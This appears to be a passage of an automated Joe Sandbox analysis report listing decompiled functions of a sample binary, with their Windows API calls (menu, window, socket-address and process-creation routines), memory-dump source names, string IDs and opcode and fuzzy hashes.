                                                                  • API String ID: 2506810119-2668193561
                                                                  • Opcode ID: 6e93480f14bc0cb0830cfb579bc7f7b484fdc2005283bdde1865efe0e8aeae07
                                                                  • Instruction ID: 3cb34c7e30acc291a485f67b5cb2b8ec60e13b6a14bde29400bc489297c7f14c
                                                                  • Opcode Fuzzy Hash: 6e93480f14bc0cb0830cfb579bc7f7b484fdc2005283bdde1865efe0e8aeae07
                                                                  • Instruction Fuzzy Hash: 0A319771A00219AFCB11DF99DC81E9EBBFEEF86711F1041AAFC049B211E6704E45CB94
                                                                  Function 0068CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0068CBB1
                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 0068CBF7
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006F29C0,01536568), ref: 0068CC40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem
                                                                  • String ID: 0
                                                                  • API String ID: 135850232-4108050209
                                                                  • Opcode ID: 9d8a87db221808aa6f52b40ac1ed27e961bcc59fa8af010911c2abc5d4c6c244
                                                                  • Instruction ID: 15511bc9b8b62cffec532e812c51bd55809b2cb24bd27763f44cbb08675949e3
                                                                  • Opcode Fuzzy Hash: 9d8a87db221808aa6f52b40ac1ed27e961bcc59fa8af010911c2abc5d4c6c244
                                                                  • Instruction Fuzzy Hash: 2941BF712047029FD720EF24D885F6ABBEAAF84724F144B1DF9A597391D730A904CB66
                                                                  Function 006B4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006BDCD0,00000000,?,?,?,?), ref: 006B4F48
                                                                  • GetWindowLongW.USER32 ref: 006B4F65
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B4F75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 6d2a59c918e29f3636d86b8ad6aa71c8c510ed35d06431521da7f118fd91cacc
                                                                  • Instruction ID: d1550166ecc025b1042974fa890d0016c270b4fb76b08cd55884afd4025eee30
                                                                  • Opcode Fuzzy Hash: 6d2a59c918e29f3636d86b8ad6aa71c8c510ed35d06431521da7f118fd91cacc
                                                                  • Instruction Fuzzy Hash: B131A1B1204605AFDB208E78DC45BEA77AAEF48334F204725F975972D1DB70EC919B50
                                                                  Function 006A3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006A3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,006A3AD4,?,?), ref: 006A3DD5
                                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006A3AD7
                                                                  • _wcslen.LIBCMT ref: 006A3AF8
                                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 006A3B63
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 946324512-2422070025
                                                                  • Opcode ID: adbac5e7b011e05d99041d14cdd99eff2d367b947d2a7516f5ebe75d917582c8
                                                                  • Instruction ID: 39422ce1bb05f4ede992498ce7d4fbe2eb9bb593fd6d3161e06e38bcdc1aec9a
                                                                  • Opcode Fuzzy Hash: adbac5e7b011e05d99041d14cdd99eff2d367b947d2a7516f5ebe75d917582c8
                                                                  • Instruction Fuzzy Hash: B43192756002119FCB10EF68C585AA977A3EF26314F248159F8168B3A2D731EE45CB70
                                                                  Function 006B4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006B49DC
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006B49F0
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B4A14
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: 4cb17b5340415c1d5e33456785de10bc2447bf0f6c9b71575f8ba232eb105ce2
                                                                  • Instruction ID: 27fac29144594a84bbafcf7159ea3dd29482996b1e2b42d5735036ce40d341c6
                                                                  • Opcode Fuzzy Hash: 4cb17b5340415c1d5e33456785de10bc2447bf0f6c9b71575f8ba232eb105ce2
                                                                  • Instruction Fuzzy Hash: 3F21DE72640219BBDF119FA4CC42FEB3B6AEF48728F110214FA156B1D1DAB1A895DB90
                                                                  Function 006B50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006B51A3
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006B51B1
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006B51B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: db630436960cb7027ea2500fb565b3769121c89bd06f61b1897b8aa815d2bf3b
                                                                  • Instruction ID: c3e01199898f7eb561f948bd4f4f0632d469ccdfb4e34df907b125b4b61ff4d6
                                                                  • Opcode Fuzzy Hash: db630436960cb7027ea2500fb565b3769121c89bd06f61b1897b8aa815d2bf3b
                                                                  • Instruction Fuzzy Hash: BB218EB5600649AFDB10DF28DC81EFB37AEEB59364B040159F9019B361CB70EC51CBA0
                                                                  Function 006B4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006B42DC
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006B42EC
                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006B4312
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: 3d9f1731efe854e59bc3ace5e81852650b555029031f306eeee72362658c48d8
                                                                  • Instruction ID: e42910030958afc118dd9495ac30f1fdf26a2234cf004cb253b31067aa1003f2
                                                                  • Opcode Fuzzy Hash: 3d9f1731efe854e59bc3ace5e81852650b555029031f306eeee72362658c48d8
                                                                  • Instruction Fuzzy Hash: 62218072614218BBEF118F94DC85FFB3B6FEF89754F118124F9049B291CA719C929BA0
                                                                  Function 00695439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0069544D
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006954A1
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,006BDCD0), ref: 00695515
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume
                                                                  • String ID: %lu
                                                                  • API String ID: 2507767853-685833217
                                                                  • Opcode ID: 10f2eb5c0b9011e84b56a4a9c5e1a3d7cb8a38a92a2bb185145f68a642b1ebc2
                                                                  • Instruction ID: 30cfb2a7535613367eddbbe92263c7defb39d4d83d3264e86d5d93df7d9b9f72
                                                                  • Opcode Fuzzy Hash: 10f2eb5c0b9011e84b56a4a9c5e1a3d7cb8a38a92a2bb185145f68a642b1ebc2
                                                                  • Instruction Fuzzy Hash: 61315070A00109AFDB51DF64C885EAA7BFAEF04308F1540A9F509DB362D771EE45CB61
                                                                  Function 006B8305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 006B8339
                                                                  • EnumChildWindows.USER32(?,006B802F,00000000), ref: 006B83B0
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                  • String ID: (o$(o
                                                                  • API String ID: 3814560230-1888461534
                                                                  • Opcode ID: 59d5c8f87e69d64c1a803e18d800f22fe384b0e0558aca7d408e9786d2fc14c0
                                                                  • Instruction ID: c0a50b88e104ca49244fad43240c43be1fce4264203b3b05f371c606ad06054b
                                                                  • Opcode Fuzzy Hash: 59d5c8f87e69d64c1a803e18d800f22fe384b0e0558aca7d408e9786d2fc14c0
                                                                  • Instruction Fuzzy Hash: 90215CB4205606DFC724DF69E850AE6B7FAFB49760F200619E875873A0DB70A880CF60
                                                                  Function 006B4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006B4CED
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006B4D02
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006B4D0F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: f35e8eedd34a47287c632d157db0d2d7d06288331ecac86aecb5ec6ac971dd2b
                                                                  • Instruction ID: 8d5b65aad113c35adebf81cdf5d3ff68bd7d3c2b3801b2d777a479506c7af7d3
                                                                  • Opcode Fuzzy Hash: f35e8eedd34a47287c632d157db0d2d7d06288331ecac86aecb5ec6ac971dd2b
                                                                  • Instruction Fuzzy Hash: 531136B1240248BEEF205F65CC06FEB3BAEEF84B64F110124FA50E61A1CA71DC90CB10
                                                                  Function 0068389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                    • Part of subcall function 006836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00683712
                                                                    • Part of subcall function 006836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00683723
                                                                    • Part of subcall function 006836F4: GetCurrentThreadId.KERNEL32 ref: 0068372A
                                                                    • Part of subcall function 006836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00683731
                                                                  • GetFocus.USER32 ref: 006838C4
                                                                    • Part of subcall function 0068373B: GetParent.USER32(00000000), ref: 00683746
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0068390F
                                                                  • EnumChildWindows.USER32(?,00683987), ref: 00683937
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                  • String ID: %s%d
                                                                  • API String ID: 1272988791-1110647743
                                                                  • Opcode ID: aad484e01276c2820e23cc5606972e34a516aa0d28514ad8b460f7974aace1dd
                                                                  • Instruction ID: 3d34094ee88fb4455f252c449d4ae58adaa89baebece3fcd2827878defeae4ec
                                                                  • Opcode Fuzzy Hash: aad484e01276c2820e23cc5606972e34a516aa0d28514ad8b460f7974aace1dd
                                                                  • Instruction Fuzzy Hash: 9211E4B16002196BCF41BF749C85AED77ABAF94700F008179FD09AB392EE709A45CB34
                                                                  Function 006259FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(?), ref: 00625A34
                                                                  • DestroyWindow.USER32(?,006237B8,?,?,?,?,?,00623709,?,?), ref: 00625A91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyObjectWindow
                                                                  • String ID: <)o$<)o
                                                                  • API String ID: 2587070983-1376019333
                                                                  • Opcode ID: 2ace4e5710cd19e0f6c21bdfe45e30fc8876bd054ff5be8024b1d5e638d19d73
                                                                  • Instruction ID: c1cc4deab4b342639804666dfa36edc2d8f82601bdc47ac89c624a12366996de
                                                                  • Opcode Fuzzy Hash: 2ace4e5710cd19e0f6c21bdfe45e30fc8876bd054ff5be8024b1d5e638d19d73
                                                                  • Instruction Fuzzy Hash: 7121E534606A26CFDB28DB2AF8A5B7837E3BB45311F04A159E8029B361DBB49C45CF45
                                                                  Function 006B6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006B6360
                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006B638D
                                                                  • DrawMenuBar.USER32(?), ref: 006B639C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$InfoItem$Draw
                                                                  • String ID: 0
                                                                  • API String ID: 3227129158-4108050209
                                                                  • Opcode ID: 2621e5a8a4fb1a9fc8f555a2389e1aecd49678cd8117656cc47d2699d6b96781
                                                                  • Instruction ID: 981e241cf0378a53a0d7cca09adb7caffd35214c3e95483d55c26db69b9d4a9e
                                                                  • Opcode Fuzzy Hash: 2621e5a8a4fb1a9fc8f555a2389e1aecd49678cd8117656cc47d2699d6b96781
                                                                  • Instruction Fuzzy Hash: B3015EB2510214AFDF619F51DC84FEE7BB6FB44351F108099F54A96150DB3489C5EF21
                                                                  Function 006B823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,006F28E0,006BAD55,000000FC,?,00000000,00000000,?), ref: 006B823F
                                                                  • GetFocus.USER32 ref: 006B8247
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 006B82B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$FocusForegroundMessageSend
                                                                  • String ID: (o
                                                                  • API String ID: 3601265619-1684096767
                                                                  • Opcode ID: cedfa1b5964f1034c657021250430bfeb904724481b2544e4b4321142e6bdfa5
                                                                  • Instruction ID: 0cea4d6c4225bdbbe27d2bff702a4e27080195c283f741daf73f34b59ebbfb70
                                                                  • Opcode Fuzzy Hash: cedfa1b5964f1034c657021250430bfeb904724481b2544e4b4321142e6bdfa5
                                                                  • Instruction Fuzzy Hash: 7E015E71602911DFD3259F68D864AE937EBEB89320F14426DE5168B3A0DF316D87CF80
                                                                  Function 006B8526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyAcceleratorTable.USER32(?), ref: 006B8576
                                                                  • CreateAcceleratorTableW.USER32(00000000,?,?,?,0069BE96,00000000,00000000,?,00000001,00000002), ref: 006B858C
                                                                  • GetForegroundWindow.USER32(?,0069BE96,00000000,00000000,?,00000001,00000002), ref: 006B8595
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                  • String ID: (o
                                                                  • API String ID: 986409557-1684096767
                                                                  • Opcode ID: fe26346ff05910d5004603de14c187e4282ed7247205123cb34470938acc69e7
                                                                  • Instruction ID: c27a0db6d7455c228fb39d990f784467a9c40405c1ce074e8645d3eb0d6c925b
                                                                  • Opcode Fuzzy Hash: fe26346ff05910d5004603de14c187e4282ed7247205123cb34470938acc69e7
                                                                  • Instruction Fuzzy Hash: 29011B72501706DFCB74DF69D894AA537A7FB44321F149629E521873B0DB70A990CF50
                                                                  Function 006B8BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006F4038,006F407C), ref: 006B8C1A
                                                                  • CloseHandle.KERNEL32 ref: 006B8C2C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: 8@o$|@o
                                                                  • API String ID: 3712363035-1293239338
                                                                  • Opcode ID: 162267fbd27936e68a0429aecbff850eceac01865837bcf0a60496ea90005d8a
